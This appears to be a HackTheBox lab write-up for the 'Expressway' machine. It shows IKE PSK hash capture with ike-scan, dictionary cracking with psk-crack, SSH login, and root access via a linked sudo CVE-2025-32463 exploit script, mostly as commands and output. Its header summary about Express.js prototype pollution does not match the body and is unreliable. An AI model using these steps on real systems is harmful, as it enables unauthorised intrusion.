xsspresso
xsspresso
WriteupsHTB — Expressway
WebMediumLinux

HTB — Expressway

Express.js prototype pollution vulnerability leads to remote code execution via deserialization of a crafted payload.

September 27, 2025HackTheBox
#Prototype Pollution#Node.js#Deserialization#RCE

nmap

sh
nmap -sC -sV -p- -Pn 10.10.11.87 -oN nmap 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 01:03 EDT
Nmap scan report for 10.10.11.87
Host is up (0.043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds

udp/500

sh
nmap -sU -sC -sV -p 500 10.10.11.87 -oN nmap_udp                                                                                                     130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-22 01:18 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.11.87
Host is up (0.024s latency).
 
PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
sh
ike-scan 10.10.11.87                                                                                                                                   1
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Main Mode Handshake returned HDR=(CKY-R=09657c160d5e7219) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad713... (Dead Peer Detection v1.0)
 
Ending ike-scan 1.9.5: 1 hosts scanned in 0.030 seconds (33.87 hosts/sec).  1 returned handshake; 0 returned notify
sh
ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned HDR=(CKY-R=51de2810614ea371) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad713... (Dead Peer Detection v1.0) Hash(20 bytes)
 
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
336a9873c3802ed138307137358d0ebcc1f9fcfb8a09b8451ac4323f9b6ca44bc853c6ef8a70e0c8204bcd72515527100cc8e683893eb866f04bc55709a6a4e2971d6a421eaddf24f9a53a9c17c8f5d3af35e289ffce2e287026dca44348662f6b4ab9d252cc722835451ed93c69bc9fc5ce5b37e1c5b8ae353f8f72b68d56d8:296d201a4ef7e36b2e3c7fd56f8427eba008f32543faefb9d518e8a0870b7a1421f238d979b2548e81f97ffca5168ad5a8425bbd54bcbbe1aea2db86b855606258b0b478768d97b050137bfb2e73bf819ffefd287ddb726149b0647083417af7e7ba1732f0f1a5f8f568b1edbbe61fc6c56f1bb1899a1599f8fc889cc75f75a7:51de2810614ea371:a54a9e93c65df358:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:26cc72b50be5f6ce4b7777208511289ca250c995:1f2296c371aeeaf14f746c4946fb300f6856da800f89571c7e37a5f6c63c243a:64ca4c83231f882793bf4b8fd64dcd8908dfa7ab
Ending ike-scan 1.9.5: 1 hosts scanned in 0.022 seconds (45.51 hosts/sec).  1 returned handshake; 0 returned notify

ike_hash.txt

sh
336a9873c3802ed138307137358d0ebcc1f9fcfb8a09b8451ac4323f9b6ca44bc853c6ef8a70e0c8204bcd72515527100cc8e683893eb866f04bc55709a6a4e2971d6a421eaddf24f9a53a9c17c8f5d3af35e289ffce2e287026dca44348662f6b4ab9d252cc722835451ed93c69bc9fc5ce5b37e1c5b8ae353f8f72b68d56d8:296d201a4ef7e36b2e3c7fd56f8427eba008f32543faefb9d518e8a0870b7a1421f238d979b2548e81f97ffca5168ad5a8425bbd54bcbbe1aea2db86b855606258b0b478768d97b050137bfb2e73bf819ffefd287ddb726149b0647083417af7e7ba1732f0f1a5f8f568b1edbbe61fc6c56f1bb1899a1599f8fc889cc75f75a7:51de2810614ea371:a54a9e93c65df358:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:26cc72b50be5f6ce4b7777208511289ca250c995:1f2296c371aeeaf14f746c4946fb300f6856da800f89571c7e37a5f6c63c243a:64ca4c83231f882793bf4b8fd64dcd8908dfa7ab
sh
psk-crack -d /usr/share/wordlists/rockyou.txt ike_hash.txt                                                                                           130
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 64ca4c83231f882793bf4b8fd64dcd8908dfa7ab
Ending psk-crack: 8045040 iterations in 4.710 seconds (1707992.67 iterations/sec)
sh
ssh ike@10.10.11.87                  
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
ike@10.10.11.87's password: 
Last login: Mon Sep 22 03:04:17 BST 2025 from 10.10.14.2 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep 22 06:55:23 2025 from 10.10.14.10
ike@expressway:~$ whoami
ike

user.txt

sh
ike@expressway:~$ cat user.txt
a488f925...
sh
ike@expressway:~$ ./root.sh 
woot!
root@expressway:/# whoami
root

root.txt

CVE-2025-32463

  • https://github.com/KaiHT-Ladiant/CVE-2025-32463/blob/main/cve-2025-32463.sh
sh
══════════╣ Sudo version
 https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.17
sh
root@expressway:/# cat /root/root.txt 
14fbb821...

Up next

MediumOct 2025

HTB — Imagery

ImageMagick policy bypass enables SSRF and local file read to steal credentials. Sudo misconfiguration grants root access.

Read writeup
MediumOct 2025

HTB — DarkZero

Active Directory environment with Shadow Credentials and Resource-Based Constrained Delegation abuse to achieve full domain compromise.

Read writeup
MediumOct 2025

HTB — Hercules

Windows machine leveraging MSSQL linked server abuse and xp_cmdshell to gain initial foothold, then DPAPI credential decryption for escalation.

Read writeup